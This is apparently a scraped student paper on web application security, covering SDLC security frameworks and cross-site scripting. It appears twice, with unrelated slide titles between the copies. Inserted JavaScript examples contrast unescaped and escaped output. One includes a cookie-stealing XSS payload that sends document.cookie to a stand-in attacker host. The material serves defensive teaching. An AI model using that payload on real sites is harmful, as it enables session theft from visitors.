Web Application Security
Improving Critical Web-based Applications Quality through in-depth
Security Analysis
SAAD SAIF
Department Of Computer Sciences
Lahore Garrison University
Abstract
The Internet, and specifically the World Wide Web, has become one of the most widely used communication media in the world. A huge number of users connect daily to various web-based applications to search for information, exchange messages, communicate with one another, conduct business, pay taxes, perform financial operations and much more. Some of these critical online services are targeted by malicious users hoping to exploit potential weaknesses and vulnerabilities, which could not only cause disruption of the service but also compromise users' and organizations' data. Most of the time, these malicious users succeed in exploiting various kinds of vulnerabilities, and the consequences can be disastrous. Most of these vulnerabilities are directly related to the web applications' lack of quality, resulting from a poorly executed software development life cycle (SDLC).
Keywords: Web Application, Security, Automated Testing, Quality, Critical
INTRODUCTION
Security was, still is and always will be one of the major concerns of critical systems, particularly when they are deployed on the World Wide Web and accessible through a web browser. Nowadays there is a huge number of services deployed on the World Wide Web, and people depend on this communication infrastructure to perform everyday tasks. Examples of these tasks are: tax payments, banking operations, e-shopping, email, government health-care system operations, etc. Moreover, in certain countries these tasks are actually required; one example is Portugal, where the public administration services were fully deployed on the Web with the aim of bringing government and citizens together.
Most security concerns are currently related to the application level. This has one simple explanation: web applications are accessible through browsers, and can be reached by everybody with Internet access. This carries the intrinsic risk that well- or badly-intentioned individuals can take advantage of it and perform malicious actions. The number of attacks reported by certain entities clearly confirms this. The National Institute of Standards and Technology (NIST) maintains a National Vulnerability Database (NVD), which holds more than 40000 vulnerabilities identified at the application level as of March 13, 2010. This is also confirmed by the Gartner Group, which estimates that 70% of the attacks on an organization's web applications originate at the application level.
WEB APPLICATIONS AS THE WEAKEST LINK
Web applications are no longer confined to back offices and home entertainment. Nowadays, web applications have become the most important applications in everybody's life and are involved in most activities users perform on the Internet. Security professionals often misjudge the real issue behind today's security flaws: software. Software is the weakest link in security. Application-level security covers many issues within this topic and cannot be reduced to good programming practices. Evidence that security issues are related to software is that, besides the growing number of application-level vulnerabilities exploited over the last few years, organizations such as OWASP, WASC, CERT.PT and others are becoming more active every day, and security professionals are beginning to understand and fully accept their recommendations. The OWASP Top 10 and the WASC Threat Classification point precisely to the most notable application-layer security issues, which derive from the broad experience of security specialists around the world.
SECURITY INTEGRATION WITH THE SDLC
The unpredictability of, and market demand for, critical web-based applications have led to a growth in the development of security models for the software development life cycle. One of the foundations of these frameworks is that security must be present through every phase of the SDLC, thereby achieving quality as an end result. This usually involves communication and collaboration from top management (CIO, CEO and others), running down the hierarchy through project managers and developers. The reason for this organizational awareness is simple: security is a process, not an end product, and should be handled as such, incorporating the experiences, views and concerns of everybody.
Microsoft Security Development Lifecycle (MS SDL)
Microsoft's methodology is perhaps one of the most widely used in the business domain. This is largely driven by the fact that their products are present in every market and technology, which encourages adoption of their practices. MS SDL is described by Microsoft as being adaptable (it applies to large, medium and small organizations, to different development methodologies and to any platform), cost-effective (they cite a NIST study which states that fixing code after deployment can cost up to 30 times more than fixing it during the development stage) and measurable (they present studies comparing the number of vulnerabilities with and without their framework).
Building Security in Maturity Model (BSIMM)
OWASP Software Assurance Maturity Model (SAMM)
The OWASP SAMM is a framework which aims to help organizations formulate a strategy for software security. This framework provides all of its resources for free and helps in:
• Evaluating an organization's existing software security practices
• Building a balanced software security assurance program in well-defined iterations
• Demonstrating improvements to a security assurance program
• Defining and measuring security-related activities throughout an organization.
Literature Review
Over the last few years, application-level vulnerabilities have been exploited with serious consequences. Hackers have tricked e-commerce sites into shipping goods for no charge, usernames and passwords have been harvested, and confidential information (for instance, addresses and credit card numbers) has been leaked. Researchers are starting to investigate new tools and techniques which address the problem of application-level web security from many directions: before, within and after development. Glisson and Welland argue that security should be addressed from the very start of the application development process, through a self-governing adaptable framework that contains customizable security components.
Literature Survey
Among the many attacks on web applications, cross-site scripting (XSS) is one of the most common. An XSS attack involves injecting malicious content into a trusted website so that it executes in a visitor's browser without the visitor's knowledge, thereby enabling the attacker to access sensitive user data, for instance session tokens and cookies stored in the browser. With this data, attackers can carry out several malicious acts, including identity theft, key-logging, phishing, user impersonation and webcam activation.
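To make the XSS mechanism above concrete from the defender's side, here is an added example (not code from the paper) showing a page-rendering function that reflects user input unescaped beside a hardened version that HTML-encodes it, plus a session cookie carrying the HttpOnly, Secure and SameSite attributes so that script running in the page cannot read the session token the paragraph describes. The function names, the escaping table and the sample input are all constructed for this illustration.

```javascript
// Added example: reflected XSS in a server-rendered page and its two fixes
// (output encoding, and cookie attributes that limit what a script can steal).
// All names here (escapeHtml, renderUnsafe, renderSafe, ...) are assumptions.

// Map every character that can break out of an HTML text node or attribute
// value to its entity, so user input is always rendered as literal text.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the user-supplied name is concatenated straight into markup, so
// a value containing tags is parsed as tags by the visitor's browser.
function renderUnsafe(name) {
  return `<p>Hello, ${name}!</p>`;
}

// Hardened: the same page, but the input is encoded before insertion, so the
// browser shows the characters instead of interpreting them.
function renderSafe(name) {
  return `<p>Hello, ${escapeHtml(name)}!</p>`;
}

// Small check for the demo: does the rendered HTML contain any element other
// than the <p> the page author wrote? A reviewer or test suite can use this
// to catch unencoded output before it ships.
function containsInjectedTag(html) {
  const tags = html.match(/<\/?[a-zA-Z][^>]*>/g) || [];
  return tags.some((tag) => !/^<\/?p>$/.test(tag));
}

// Session cookie with the attributes that limit the impact of a successful
// XSS: HttpOnly keeps document.cookie from reading it, Secure keeps it off
// plain HTTP, SameSite=Strict keeps it off cross-site requests.
function sessionCookie(token, maxAgeSeconds = 3600) {
  // Expect an opaque, URL-safe token; reject anything that looks structured.
  if (!/^[A-Za-z0-9_-]{32,}$/.test(token)) {
    throw new Error("session token must be an opaque URL-safe string");
  }
  return `session=${token}; Path=/; Max-Age=${maxAgeSeconds}; HttpOnly; Secure; SameSite=Strict`;
}

// Constructed sample input: a "name" that is really a script element.
const SAMPLE_INPUT = "<script>alert(document.cookie)</script>";

// Render both variants and build a cookie for a constructed token.
function demo() {
  return {
    unsafe: renderUnsafe(SAMPLE_INPUT),
    safe: renderSafe(SAMPLE_INPUT),
    cookie: sessionCookie("constructed-opaque-token-0123456789ab"),
  };
}

console.log(demo());
```

Running the block prints the unescaped page (where the script element survives), the escaped page (where it is inert text) and the cookie header line.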
Confusion Matrix
Results
In all the articles I read, web applications are presented as more secure and well-defined applications, which are best provided as web services such as those offered by Google and other search engines. There is also a lot of work on all web applications for their security and against other harmful activities that can harm them. So all experts work on the analysis and testing of web applications and try to keep critical information safe so that it is not used by third parties.
Title
• Improving Critical Web-based Applications Quality through in-depth Security Analysis
• Web Application Security Tools Analysis
• Tool-Based Approach to Assessing Web Application Security
• Semantic security against web application attacks
• Privacy Solutions
Conclusion
The quality of critical web applications cannot be separated from security concerns. Security must be present in every critical web application, as it is a quality attribute every user takes for granted. In this paper we focused on the integration of security practices in the SDLC. The SDLC aims at standardizing patterns and principles for developing software with a higher level of quality. The integration of security within those models is essential for these applications, and therefore security activities were defined for each phase of the SDLC, leading to an increase in web application quality throughout the whole development process. Web applications are nowadays the gateway between people and everyday activities with the whole world. This must be understood, and therefore quality standards must be raised, which from our perspective can only happen with the addition of security.
 
Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17
 
Gas measurement O2,Co2,& ph) 04/2024.pptx
Gas measurement O2,Co2,& ph) 04/2024.pptxGas measurement O2,Co2,& ph) 04/2024.pptx
Gas measurement O2,Co2,& ph) 04/2024.pptx
 
Computed Fields and api Depends in the Odoo 17
Computed Fields and api Depends in the Odoo 17Computed Fields and api Depends in the Odoo 17
Computed Fields and api Depends in the Odoo 17
 
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxMULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
 
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptxECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
 
Keynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-designKeynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-design
 
How to Add Barcode on PDF Report in Odoo 17
How to Add Barcode on PDF Report in Odoo 17How to Add Barcode on PDF Report in Odoo 17
How to Add Barcode on PDF Report in Odoo 17
 
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
 
Grade 9 Q4-MELC1-Active and Passive Voice.pptx
Grade 9 Q4-MELC1-Active and Passive Voice.pptxGrade 9 Q4-MELC1-Active and Passive Voice.pptx
Grade 9 Q4-MELC1-Active and Passive Voice.pptx
 
ENGLISH6-Q4-W3.pptxqurter our high choom
ENGLISH6-Q4-W3.pptxqurter our high choomENGLISH6-Q4-W3.pptxqurter our high choom
ENGLISH6-Q4-W3.pptxqurter our high choom
 
Like-prefer-love -hate+verb+ing & silent letters & citizenship text.pdf
Like-prefer-love -hate+verb+ing & silent letters & citizenship text.pdfLike-prefer-love -hate+verb+ing & silent letters & citizenship text.pdf
Like-prefer-love -hate+verb+ing & silent letters & citizenship text.pdf
 
Full Stack Web Development Course for Beginners
Full Stack Web Development Course  for BeginnersFull Stack Web Development Course  for Beginners
Full Stack Web Development Course for Beginners
 
Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...
 
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptxINTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
 
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
 

Research Article On Web Application Security

Most security concerns are nowadays related to the application level. This has a simple explanation: web applications are accessed through browsers, and can therefore be reached by everyone with Internet access. This carries the inherent risk that well- or ill-intentioned people can take advantage of it and perform malicious actions. The number of attacks reported by several entities confirms this. The National Institute of Standards and Technology (NIST) maintains the National Vulnerability Database (NVD), which listed more than 40000 vulnerabilities identified at the application level as of March 13, 2010. This is also supported by the Gartner Group, which estimates that 70% of the attacks on an organization's web applications originate at the application level.

WEB APPLICATIONS AS THE WEAKEST LINK

Web applications no longer relate only to back offices and home entertainment. Nowadays, web applications have become the most significant applications in everybody's life and are involved in most of the activities users carry out on the Internet. Security professionals often misjudge the real issue behind today's security flaws: software. Software is the weakest link in security. Application-level security involves many issues, and it cannot be reduced to good programming practices. Evidence that security issues are tied to software is that, besides the growing number of application-level vulnerabilities exploited over the last few years, organizations such as OWASP, WASC, CERT.PT and others are becoming more active every day, and security professionals are beginning to understand and fully accept their recommendations. The OWASP Top 10 and the WASC Threat Classification point precisely to the best-known application-layer security issues, which derive from the broad experience of security specialists around the world.

SECURITY INTEGRATION WITH THE SDLC

The complexity of, and market demand for, critical web-based applications has led to a growth in the development of security models for the software development life cycle (SDLC).
One of the foundations of these frameworks is that security must be present in every phase of the SDLC, thereby achieving quality as the final result. This usually involves communication and cooperation from the top ranks (CIO, CEO and others) down the hierarchy, through project managers and developers. The point of this organizational awareness is simple: security is a process, not a final product, and should be treated as such, incorporating the experiences, visions and concerns of everyone.

Microsoft Security Development Lifecycle (MS SDL)

Microsoft's methodology is perhaps one of the most used in the business sector. This is largely driven by the fact that their products are present in every market and technology, encouraging the adoption of their practices. The MS SDL is described by Microsoft as flexible (it applies to large, medium and small organizations, to different development methodologies and to any platform), cost-effective (they cite a NIST study claiming that fixing code after deployment can cost up to 30 times more than fixing it during the development phase) and measurable (they present studies comparing the number of vulnerabilities with and without its adoption).

Building Security in Maturity Model (BSIMM)
OWASP Software Assurance Maturity Model (SAMM)

The OWASP SAMM is a framework that aims to help organizations design a strategy for software security. The framework provides all of its resources for free and helps in:
• Evaluating the organization's existing software security practices
• Building a balanced software security assurance program in well-defined iterations
• Demonstrating concrete improvements to a security assurance program
• Defining and measuring security-related activities throughout an organization

Literature Review

Over the last few years, application-level vulnerabilities have been exploited with serious consequences. Attackers have tricked e-commerce sites into shipping goods for no charge, usernames and passwords have been harvested, and confidential information (such as addresses and credit card numbers) has been leaked. Researchers have begun to investigate new tools and techniques that address the problem of application-level web security from several directions: before, during and after development. Glisson and Welland argue that security should be considered first, before the application development process, through an autonomous adaptable framework containing configurable security components.

Literature Survey

Among the many attacks on web applications, cross-site scripting (XSS) is one of the most common. An XSS attack involves injecting malicious content into a trusted website so that it executes in a visitor's browser without the visitor's knowledge, which allows the attacker to access sensitive user data such as session tokens and cookies stored by the browser. With this data, attackers can carry out several malicious acts, including fraud, key-logging, phishing, user impersonation and webcam activation.
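The XSS attack described above, as an added example that is not part of the original paper: a search page whose vulnerable template concatenates the user's query straight into HTML, beside the hardened version that encodes the value for the HTML text context, plus the HttpOnly cookie attribute that keeps the session cookie out of reach of any script that does get injected. The function names, the attacker payload and the cookie value are constructed for this illustration and are not taken from any real application.

```javascript
// Added example (not from the paper): reflected XSS on a search page,
// the vulnerable template beside its hardened form. All names are ours.

// Constructed attacker input: the cookie-stealing payload the paper
// describes (session tokens and cookies exfiltrated by injected script).
const PAYLOAD =
  "<script>new Image().src='http://attacker.example/c?'+document.cookie</script>";

// Vulnerable: the untrusted query is concatenated straight into markup,
// so the browser parses the attacker's <script> as part of the page.
function renderSearchVulnerable(query) {
  return `<p>Results for: ${query}</p>`;
}

// HTML-escape for a text node or double-quoted attribute context. These
// five characters cover those two contexts only; values placed inside
// JavaScript, URLs or CSS need the encoder for that context instead.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: same page, the untrusted value is encoded before insertion,
// so the payload is rendered as literal text rather than executed.
function renderSearchSafe(query) {
  return `<p>Results for: ${escapeHtml(query)}</p>`;
}

// Crude stand-in for a browser: does the markup contain a script element?
// Escaped output contains "&lt;script" instead, which never matches.
function containsScriptElement(html) {
  return /<script\b/i.test(html);
}

// Defence in depth for the same attack: with HttpOnly set, the session
// cookie is not exposed through document.cookie even if an injection
// slips past the encoder. Secure and SameSite limit leakage further.
function sessionCookieHeader(sessionId) {
  return `sid=${encodeURIComponent(sessionId)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

console.log("vulnerable:", renderSearchVulnerable(PAYLOAD));
console.log("hardened  :", renderSearchSafe(PAYLOAD));
console.log("cookie    :", sessionCookieHeader("constructed-session-id"));
```

Output encoding is applied at the point of output, not at input, because the same value may later be emitted into a different context; the HttpOnly flag does not prevent the injection, it only removes the cookie from what the injected script can read.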
Confusion Matrix Results

In all the articles I read, web applications are presented as secure and well-defined applications, which are best as web services such as those provided to us by Google and other search engines. So there is also a lot of work on all web applications for their security and against other harmful activities which can harm them. So all experts work, analyze and test web applications and try to keep critical information safe so that it is not used by third parties.

Title
• Improving Critical Web-based Applications Quality through in-depth Security Analysis
• Web Application Security Tools Analysis
• Tool-Based Approach to Assessing Web Application Security
• Semantic security against web application attacks
• Privacy Solutions
Conclusion

Critical web application quality cannot be separated from security issues. Security must be present in every critical web application, since it is a quality measure every user takes for granted. In this paper we focused on the integration of security practices into the SDLC. The SDLC aims at defining patterns and standards for developing software of a higher level. The integration of security within those models is essential for these applications, and therefore security activities were defined for each phase of the SDLC, leading to an increase in web application quality throughout the entire development process. Web applications are nowadays the gateway between people and their everyday activities with the whole world. This must be understood, and consequently quality standards must be raised, which, from our perspective, can only happen with the addition of security.

References

[1] Backtrack (2011). Backtrack Linux - penetration testing distribution website. http://www.backtrack-linux.org/. (Access date: 15 June 2011).
[2] Brunil D. Romero M., Haddad, H. M., and Molero A., J. E. (2009). A methodological tool for asset identification in web applications. In IEEE Fourth International Conference on Software Engineering Advances, pages 413-418. IEEE.
[3] BSIMM (2011). The Building Security In Maturity Model. http://bsimm.com/. (Access date: 15 June 2011).
[4] CERT.PT (2010). CERT.PT web site. http://www.cert.pt/. (Access date: 15 June 2011).
[5] Web Application Security Consortium (2010a). WASC Threat Classification version 2.0. WASC. Web Application Security Consortium (2010b). Web Application Security Consortium web site. http://www.webappsec.org/. (Access date: 15 June 2011).
[6] Duan, B., Zhang, Y., and Gu, D. (2008). An easy-to-deploy penetration testing platform. In Young Computer Scientists, 2008. ICYCS 2008. The 9th International Conference for, pages 2314-2318.
[7] Fong, E. and Okun, V. (2007). Web application scanners: Definitions and functions. In System Sciences, 2007. HICSS 2007. 40th Annual Hawaii International Conference on, page 280b.
[8] Madan, S. and Madan, S. (2010). Security standards perspective to fortify web database applications from code injection attack. In IEEE International Conference on Intelligent Systems, Modeling and Simulation. IEEE.